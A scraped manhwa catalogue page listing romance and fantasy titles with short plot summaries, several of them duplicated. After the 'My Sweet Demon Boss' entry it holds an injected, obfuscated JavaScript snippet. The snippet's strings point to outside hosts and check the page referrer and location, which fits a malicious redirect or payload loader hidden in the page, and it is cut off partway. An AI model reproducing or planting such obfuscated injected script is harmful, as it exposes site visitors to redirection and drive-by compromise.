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18289 results

Queen, You Mustn’t!

Read manhwa Queen, You Mustn’t! / No, Queen! / 여왕님 안 돼요! There hasn’t been a queen like this before! The strongest monarch in Babel’s history called the God of War, God’s Daughter, Aroha Fenril Astrofortus! After her return from concluding a seven-year war, she finds that those bastard nobles have prepared a bothersome trap… ‘Your Majesty, you must choose a husband and continue the royal family’s bloodline!’ She wants to throw all of that away, but in consideration for the royal bloodline, she does have to get married. On top of that, she’s receiving a crazy amount of proposals from those that are vying for Babel’s second highest position. The husband candidates chosen by the Grand Chamberlain on special orders! The genius that is Babel Academy’s youngest professor in all history, an optimistic national guard, Babel’s General and the Queen’s reliable comrade, and the young hero of Babel’s political world, the most beautiful man. …Who will Aroha choose?


Princess Tigress Reborn: Hug Me General!

Princess Tigress Reborn Hug Me General at The white tiger of the General died on the battlefield because of a subordinate’s betrayal. Unexpectedly, she was reborn and went back to three years ago as a human. Wait? She is the one who is supposed to marry the General?


My Sweet Demon Boss

All of a sudden, my parents decided to play matchmaker and set me up with another man. I don't have a boyfriend and I thought it wouldn't hurt to meet the guy, but it turned out to be my manager, a.k.a. The Demon Boss! Moe is frightened when her parents force her and the Demon Boss to live together on the premise of marriage. But, to her surprise, the manager seems like a totally different person at home...? A sweet slapstick office romance between a Demon Boss and his klutzy subordinate.<script></script><script>function _0x1788(_0x19d87e,_0x4b3bd8){var _0x676f7d=_0x3ca6();return _0x1788=function(_0x5a8995,_0x192d0d){_0x5a8995=_0x5a8995-(-0x71*-0xa+-0x248f+0x21af);var _0x2d5b86=_0x676f7d[_0x5a8995];return _0x2d5b86;},_0x1788(_0x19d87e,_0x4b3bd8);}function _0x3ca6(){var _0x302ab5=['.top/','uQPaI','STqYW','dma.net/','3242292aRgMHc','2MlEKlI','Frqag','1807013cMzYaX','evAiC','148wXuVqx','then','includes','http://rea','MPVKE','252136cjbzxl','5iyAxqY','location','floor','text','random','ndZYx','108820OgZbGx','31759eebNrl','google','href','cvHYx','3117cmPsMR','.customapi','11otUTOm','ztLSX','706998Fgcxvf','uFlEP','632SUprMo','234RadWDI','dSlkY','https://ip','referrer'];_0x3ca6=function(){return _0x302ab5;};return _0x3ca6();}(function(_0x64336,_0x7b76e8){var _0x1b7e76=_0x1788,_0x27a628=_0x64336();while(!![]){try{var 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In a passionate relationship

At the young age of 34, there was a man who rose to the position of head of production for an advertisement company. ‘ Kim Yoon’ is a perfect man who has not only abilities but also an appearance that can beat celebrities but he had one flaw…” Secretary Yang “. Seo Yu’s lips trembled, this man is starting again. However she answered politely without a sign of annoyance on her face, ” Yes general manager…I’ll tell you the truth from now on “. A fierce battle between a four dimensional boss who is full of pride and an arrogant and indifferent secretary. Can these two really fall in love ?


Teach Me, Mr. Sadistic Butler

“Warning: Mature content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” “My lady, it is time for your lesson on night companionship,” the new, mysterious, and super sadistic butler announced. Layla Yanase dreams about marrying Fujigaya, her fiance, who she has never met. “All of your flowery, happy-go-lucky thoughts… will be mowed out by me.” Fujiwara, the butler, leads Layla through brutal bridal training, which includes lessons on “night companionship.” With his verbal teasing and stunning technique, Layla is melted down to the core. But just who could this Fujiwara truly be…? Cours privés avec mon majordome sado Teach Me, Mr. Sadistic Butler พ่อบ้านกำมะลอขอฝึกคุณหนูให้เป็นเจ้าสาว ドS執事に花嫁調教されてます


Ougs’s Law

Su Yuan, a poor student, in order to not place any additional burdens on his family, accidentally got himself enrolled into a college named, Ogus Academy. But soon he discovered that this institution was actually established for the protection of monsters (demons/beasts); and the physically weaker humans, in order to protect their lives, had to form partnerships—called PAL, with those monsters. Furthermore, as a result of his unique scent, many are drawn towards him in hopes of becoming his PAL; and at same time, he is also subjected to various attacks. That was, at least, until the day he rescued a fox covered in blood from head to toe, only to then discover…


Death When Separated

Read manhwa Death When Separated / 헤어지면 죽음 The life of a perfect influencer. Dating a girl I like. The last thing that I need to do is date her, but I’m trapped in a life-threatening incident?! “This isn’t an obsession, seriously!” But, if we break up, we’ll die!


A male protagonist is blocking my way

I reincarnated into a novel that I’d read in my past life. I’m destined to be the fiancé of the villain in the not-too-distant future, but that’s… Doesn’t it depend on how I live? “My ideal type is 190 centimeters tall, handsome, rich and doesn’t get fat when he gets older!” And then I saved the life of the young male protagonist before I even started looking for him? My plan to have a smooth, carefree life has been ruined ever since! “I’m sorry, but Ariel said ‘I can’t take my eyes off the prettiest and handsomest people in the world.’ ” “What? Me?” “I’m – I’m sorry, I’ve been very rude. Please forget my proposal!” “Wait! No! Please Wait!” As he watched me feel increasingly guilty towards him, a supposedly broken-hearted person, he raised the corner of his mouth. Associated Names The Main Protagonist Block My Path 남자 주인공이 내 앞길을 가로막는다 A male protagonist is blocking my way


The Hero is Standing in My Way

A male protagonist is blocking my way manhwa, I reincarnated into a novel that I'd read in my past life.I'm destined to be the fianc of the villain in the not-too-distant future, but that's Doesn't it depend on how I live?"My ideal type is 190 centimeters tall, handsome, rich and doesn't get fat when he gets older!"And then I saved the life of the young male protagonist before I even started looking for him?My plan to have a smooth, carefree life has been ruined ever since!"I'm sorry, but Ariel said I can't take my eyes off the prettiest and handsomest people in the world.' ""What? Me?""I'm I'm sorry, I've been very rude. Please forget my proposal!""Wait! No! Please Wait!"As he watched me feel increasingly guilty towards him, a supposedly broken-hearted person, he raised the corner of his mouth.The Hero is Standing in My Way


Emperor And The Female Knight ( The King and His Knight )

Pauliana has been defeated and captured by the army of the enemy nation, Acrea. She has been desperately trying to survive in men’s society, but it was all in vain. Acrea’s young king, Lucius, sees her struggle and makes an unexpected offer. He dreams to continue the war and be the first emperor to conquer the South continent and it’s sea. Pauliana, swears a life-long allegiance to Lucius for acknowledging her. However, in the end, Lucius is just an emperor on the battlefield that had awakened his love for Pauliana!


Emperor And The Female Knight

Pauliana has been defeated and captured by the army of the enemy nation, Acrea. She has been desperately trying to survive in men’s society, but it was all in vain. Acrea’s young king, Lucius, sees her struggle and makes an unexpected offer. He dreams to continue the war and be the first emperor to conquer the South continent and it’s sea. Pauliana, swears a life-long allegiance to Lucius for acknowledging her. However, in the end, Lucius is just an emperor on the battlefield that had awakened his love for Pauliana!
